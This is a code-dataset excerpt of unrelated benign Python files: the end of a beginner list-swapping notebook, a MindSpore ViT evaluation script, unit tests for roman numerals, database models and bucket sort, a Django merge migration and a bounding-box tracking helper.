"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [],
"source": [
"b = [\"banana\", \"apple\", \"microsoft\"]"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['banana', 'apple', 'microsoft']\n"
]
}
],
"source": [
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'banana'"
]
},
"execution_count": 21,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'temp' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-22-bb6d55739a6c>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 2\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined"
]
}
],
"source": [
"b[0] = temp\n",
"b[0] = b[2]\n",
"b[2] = temp"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'microsoft'"
]
},
"execution_count": 23,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]\n",
"b[2]"
]
},
{
"cell_type": "code",
"execution_count": 24,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'banana'"
]
},
"execution_count": 24,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]"
]
},
{
"cell_type": "code",
"execution_count": 25,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'microsoft'"
]
},
"execution_count": 25,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"b[0]\n",
"b[2]"
]
},
{
"cell_type": "code",
"execution_count": 26,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"banana\n",
"microsoft\n"
]
}
],
"source": [
"print(b[0])\n",
"print(b[2])"
]
},
{
"cell_type": "code",
"execution_count": 27,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'temp' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-27-af3436a9262b>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined"
]
}
],
"source": [
"b[0] = temp"
]
},
{
"cell_type": "code",
"execution_count": 28,
"metadata": {},
"outputs": [],
"source": [
"temp = b[0]"
]
},
{
"cell_type": "code",
"execution_count": 29,
"metadata": {},
"outputs": [],
"source": [
"b[0] = b[2]\n",
"b[2] = temp"
]
},
{
"cell_type": "code",
"execution_count": 30,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"microsoft\n",
"banana\n"
]
}
],
"source": [
"print(b[0])\n",
"print(b[2])"
]
},
{
"cell_type": "code",
"execution_count": 31,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['microsoft', 'apple', 'banana']\n"
]
}
],
"source": [
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": 32,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['banana', 'apple', 'microsoft']\n"
]
}
],
"source": [
"b[0], b[2] = b[2], b[0]\n",
"print(b)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.544627 | 822 | 0.450054 |
106c3edaeb7b07b24af1102f36faeacbaa7d75cf
| 3,904 |
py
|
Python
|
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-11-18T08:17:44.000Z
|
2021-11-18T08:17:44.000Z
|
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/vit_base/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Process the test set with the .ckpt model in turn.
"""
import argparse
import mindspore.nn as nn
from mindspore import context
from mindspore.train.model import Model
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.common import set_seed
from mindspore import Tensor
from mindspore.common import dtype as mstype
from mindspore.nn.loss.loss import LossBase
from mindspore.ops import functional as F
from mindspore.ops import operations as P
from src.config import cifar10_cfg
from src.dataset import create_dataset_cifar10
from src.modeling_ms import VisionTransformer
import src.net_config as configs
# Fix the global RNG seed so evaluation runs are reproducible.
set_seed(1)
# Command-line options: dataset, ViT variant, checkpoint path and device id.
parser = argparse.ArgumentParser(description='vit_base')
parser.add_argument('--dataset_name', type=str, default='cifar10', choices=['cifar10'],
                    help='dataset name.')
parser.add_argument('--sub_type', type=str, default='ViT-B_16',
                    choices=['ViT-B_16', 'ViT-B_32', 'ViT-L_16', 'ViT-L_32', 'ViT-H_14', 'testing'])
parser.add_argument('--checkpoint_path', type=str, default='./ckpt_0', help='Checkpoint file path')
parser.add_argument('--id', type=int, default=0, help='Device id')
args_opt = parser.parse_args()
class CrossEntropySmooth(LossBase):
    """Softmax cross-entropy loss with optional label smoothing.

    When `sparse` is True, integer labels are one-hot encoded with on/off
    values derived from `smooth_factor` before the loss is computed.
    """
    def __init__(self, sparse=True, reduction='mean', smooth_factor=0., num_classes=1000):
        super(CrossEntropySmooth, self).__init__()
        self.onehot = P.OneHot()
        self.sparse = sparse
        # Smoothed targets: 1 - eps on the true class, eps/(C-1) elsewhere.
        self.on_value = Tensor(1.0 - smooth_factor, mstype.float32)
        self.off_value = Tensor(1.0 * smooth_factor / (num_classes - 1), mstype.float32)
        self.ce = nn.SoftmaxCrossEntropyWithLogits(reduction=reduction)

    def construct(self, logit, label):
        # Graph-mode forward pass: one-hot encode sparse labels, then apply CE.
        if self.sparse:
            label = self.onehot(label, F.shape(logit)[1], self.on_value, self.off_value)
        loss_ = self.ce(logit, label)
        return loss_
if __name__ == '__main__':
    # Map the ViT variant name to its architecture config.
    CONFIGS = {'ViT-B_16': configs.get_b16_config,
               'ViT-B_32': configs.get_b32_config,
               'ViT-L_16': configs.get_l16_config,
               'ViT-L_32': configs.get_l32_config,
               'ViT-H_14': configs.get_h14_config,
               'R50-ViT-B_16': configs.get_r50_b16_config,
               'testing': configs.get_testing}
    context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=args_opt.id)
    if args_opt.dataset_name == "cifar10":
        # Build the network, restore the checkpoint and evaluate on the
        # CIFAR-10 validation split.
        cfg = cifar10_cfg
        net = VisionTransformer(CONFIGS[args_opt.sub_type], num_classes=cfg.num_classes)
        loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
        opt = nn.Momentum(net.trainable_params(), 0.01, cfg.momentum, weight_decay=cfg.weight_decay)
        dataset = create_dataset_cifar10(cfg.val_data_path, 1, False)
        param_dict = load_checkpoint(args_opt.checkpoint_path)
        print("load checkpoint from [{}].".format(args_opt.checkpoint_path))
        load_param_into_net(net, param_dict)
        # Inference mode: disables dropout and similar training-only layers.
        net.set_train(False)
        model = Model(net, loss_fn=loss, optimizer=opt, metrics={'acc'})
    else:
        raise ValueError("dataset is not support.")
    acc = model.eval(dataset)
    print(f"model's accuracy is {acc}")
| 43.377778 | 100 | 0.695697 |
eaaf912f0e46b43bb4864f1b95cd044d6066ff52
| 1,768 |
py
|
Python
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 8 |
2016-10-18T09:30:12.000Z
|
2021-12-08T13:28:28.000Z
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 29 |
2019-12-28T06:09:07.000Z
|
2022-03-02T03:44:19.000Z
|
python/RomanNumbers/tests/roman_to_arabic_tests.py
|
enolive/learning
|
075b714bd7bea6de58a8da16cf142fc6c8535e11
|
[
"MIT"
] | 4 |
2018-07-23T22:20:58.000Z
|
2020-09-19T09:46:41.000Z
|
import unittest
from assertpy import assert_that
from nose_parameterized import parameterized
from implementation.converter import RomanToArabic
from implementation.exceptions import IllegalArgumentError
from tests.method_conversion import as_function
class RomanToArabicTests(unittest.TestCase):
    """Unit tests for RomanToArabic.to_arabic."""
    def setUp(self):
        # Fresh converter instance for every test.
        self.target = RomanToArabic()
    @parameterized.expand([
        ("I", 1),
        ("II", 2),
        ("III", 3),
    ])
    def test_that_I_should_be_added_to_result(self, number, expected):
        # act
        result = self.target.to_arabic(number)
        # assert
        assert_that(result).is_equal_to(expected)
    def test_that_invalid_characters_fail(self):
        # Non-roman characters must raise IllegalArgumentError with a
        # descriptive message.
        assert_that(as_function(self.target.to_arabic)) \
            .raises(IllegalArgumentError) \
            .when_called_with("ThisIsNotRoman") \
            .is_equal_to("'ThisIsNotRoman' contains characters that are not a roman digit.")
    @parameterized.expand([
        ("V", 5),
        ("VI", 6),
    ])
    def test_that_V_should_be_added_to_result(self, number, expected):
        # act
        result = self.target.to_arabic(number)
        # assert
        assert_that(result).is_equal_to(expected)
    @parameterized.expand([
        ("X", 10),
        ("XII", 12),
        ("XV", 15),
    ])
    def test_that_X_should_be_added_to_result(self, number, expected):
        # act
        result = self.target.to_arabic(number)
        # assert
        assert_that(result).is_equal_to(expected)
    @parameterized.expand([
        ("IX", 9),
    ])
    # BUG FIX: this method was also named test_that_X_should_be_added_to_result,
    # so it silently replaced the X/XII/XV test above (a later def with the
    # same name overwrites the earlier one in a class body) and those cases
    # never ran. Renamed to describe the subtractive-notation case it covers.
    def test_that_IX_should_be_subtracted_from_result(self, number, expected):
        # act
        result = self.target.to_arabic(number)
        # assert
        assert_that(result).is_equal_to(expected)
| 28.983607 | 92 | 0.646493 |
dc23758a8a753da129bb0fb049af3ef4d0b61970
| 3,352 |
py
|
Python
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | 1 |
2019-10-31T13:34:12.000Z
|
2019-10-31T13:34:12.000Z
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | 1 |
2019-05-27T13:03:25.000Z
|
2019-05-27T13:03:25.000Z
|
tests/test_db.py
|
schmocker/pv-FHNW
|
5066e0bc7ce76be5d1a930b50034c746b232a9f8
|
[
"MIT"
] | null | null | null |
import pytest
from pvtool.db import PvModule, Measurement, MeasurementValues, FlasherData, ManufacturerData, db
@pytest.mark.incremental
class TestDBModels(object):
    """Round-trip insert/query/delete tests for the core database models.

    Each test inserts a sentinel row, asserts it can be queried back, then
    deletes it again so the database is left in its initial state.
    """

    # BUG FIX: these methods previously declared ``(client, init_db)`` without
    # ``self``, so pytest bound the class instance to the parameter named
    # ``client`` -- misleading, and no ``client`` fixture was ever requested.
    # ``self`` is now explicit; the fixtures actually requested (``init_db``)
    # are unchanged.

    def test_pv_module_insert(self, init_db):
        """
        GIVEN a database
        WHEN database is initialized
        THEN check if pv_module can be inserted and removed
        """
        test_pv_module = PvModule(model="TEST",
                                  manufacturer="TEST",
                                  cell_type="TEST",
                                  additional_information="TEST",
                                  price_CHF="-999",
                                  length="-999",
                                  width="-999",
                                  shunt_resistance="-999",
                                  )
        db.session.add(test_pv_module)
        db.session.commit()

        query_result = db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).first()
        assert query_result

        # clean up the sentinel row so later tests see a pristine database
        db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).delete()
        db.session.commit()

    def test_measurement_insert(self, init_db):
        """
        GIVEN a database
        WHEN database is initialized
        THEN check if measurement can be inserted and removed
        """
        test_measurement = Measurement(date='TEST',
                                       measurement_series='TEST',
                                       producer='TEST',
                                       pv_module_id=1,
                                       )
        db.session.add(test_measurement)
        db.session.commit()

        query_result = db.session.query(Measurement).filter(
            Measurement.measurement_series == test_measurement.measurement_series).first()
        assert query_result

        db.session.query(Measurement).filter(
            Measurement.measurement_series == test_measurement.measurement_series).delete()
        db.session.commit()

    def test_measurement_values_insert(self, init_db):
        """
        GIVEN a database
        WHEN database is initialized
        THEN check if measurement_values can be inserted and removed
        """
        test_measurement_values = MeasurementValues(weather='TEST',
                                                    _U_module=0,
                                                    _U_shunt=0,
                                                    _U_T_amb=0,
                                                    _U_T_pan=0,
                                                    _U_G_hor=0,
                                                    _U_G_pan=0,
                                                    _U_G_ref=0,
                                                    measurement_id=1,
                                                    )
        db.session.add(test_measurement_values)
        db.session.commit()

        query_result = db.session.query(MeasurementValues).\
            filter(MeasurementValues.weather == test_measurement_values.weather).first()
        assert query_result

        db.session.query(MeasurementValues).filter(MeasurementValues.weather == test_measurement_values.weather).delete()
        db.session.commit()

    def insert_multiple_pv_modules(self, init_db):
        # Placeholder for a bulk-insert helper; not implemented yet.
        pass
| 42.43038 | 138 | 0.50716 |
f4a639b713112f9b536c024ee64449eca00ae287
| 279 |
py
|
Python
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.4 on 2020-03-30 01:52
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated merge migration: reconciles the two divergent 0003
    # migrations listed below so the migration graph has a single leaf.
    # It intentionally performs no schema operations of its own.

    dependencies = [
        ('iamstudent', '0003_auto_20200330_0020'),
        ('iamstudent', '0003_auto_20200329_1859'),
    ]

    operations = [
    ]
| 18.6 | 50 | 0.655914 |
8734132541ab5ce69ed240741277e35a508b597f
| 723 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch09_search_and_sort.solutions.ex07_bucket_sort import bucket_sort
@pytest.mark.parametrize("values, max_value, expected",
                         [([10, 50, 22, 7, 42, 111, 50, 7], 150,
                           [7, 7, 10, 22, 42, 50, 50, 111]),
                          ([10, 50, 22, 7, 42, 111, 50, 7], 120,
                           [7, 7, 10, 22, 42, 50, 50, 111]),
                          ([5, 2, 7, 9, 6, 3, 1, 4, 2, 3, 8], 10,
                           [1, 2, 2, 3, 3, 4, 5, 6, 7, 8, 9])])
def test_bucket_sort(values, max_value, expected):
    """bucket_sort must return the values in ascending order.

    ``max_value`` is the upper bound passed to the sort (renamed from ``max``
    so the parameter no longer shadows the builtin). The third case, which
    used a list instead of a tuple, is normalized for consistency.
    """
    result = bucket_sort(values, max_value)
    assert result == expected
| 34.428571 | 71 | 0.492393 |
0deda45b4198481e5651eed91a682068abdec048
| 1,830 |
py
|
Python
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
def do_action(bbox, opts, act, imSize):
    """Apply tracker action ``act`` to a bounding box and clamp it to the image.

    Args:
        bbox: box as [x, y, w, h] (top-left corner plus size). Not modified.
            (The previous implementation shifted ``bbox`` to center form in
            place and shifted it back at the end; the float round-trip could
            leave the caller's box perturbed, so this version keeps all
            intermediate values in locals instead.)
        opts: options dict; ``opts['action_move']`` supplies per-axis move
            factors 'x', 'y', 'w', 'h' and the per-action 'deltas' matrix.
        act: row index into the 'deltas' matrix selecting the action.
        imSize: image size, indexed as (height, width) below.

    Returns:
        np.ndarray: the moved box [x, y, w, h], clamped inside the image and
        with width/height forced into [5, image extent].
    """
    m = opts['action_move']

    # Work in center coordinates, leaving the caller's bbox untouched.
    w, h = bbox[2], bbox[3]
    cx = bbox[0] + 0.5 * w
    cy = bbox[1] + 0.5 * h

    # Per-axis step sizes proportional to the current box size, at least 1 px.
    deltas = np.maximum([m['x'] * w, m['y'] * h, m['w'] * w, m['h'] * h], 1)

    # Tie the smaller size step to the larger one via the aspect ratio.
    ar = w / h
    if w > h:
        deltas[3] = deltas[2] / ar
    else:
        deltas[2] = deltas[3] * ar

    # Select the action row and scale it by the step sizes.
    action_delta = np.multiply(np.array(m['deltas'])[act, :], deltas)
    bbox_next = np.array([cx, cy, w, h], dtype=float) + action_delta

    # Convert back to corner coordinates.
    bbox_next[0] = bbox_next[0] - 0.5 * bbox_next[2]
    bbox_next[1] = bbox_next[1] - 0.5 * bbox_next[3]

    # Clamp the corner inside the image (imSize indexed as (height, width)).
    bbox_next[0] = np.maximum(bbox_next[0], 1)
    bbox_next[0] = np.minimum(bbox_next[0], imSize[1] - bbox_next[2])
    bbox_next[1] = np.maximum(bbox_next[1], 1)
    bbox_next[1] = np.minimum(bbox_next[1], imSize[0] - bbox_next[3])

    # Clamp the size to [5, image extent].
    bbox_next[2] = np.maximum(5, np.minimum(imSize[1], bbox_next[2]))
    bbox_next[3] = np.maximum(5, np.minimum(imSize[0], bbox_next[3]))

    return bbox_next
| 33.888889 | 78 | 0.598361 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.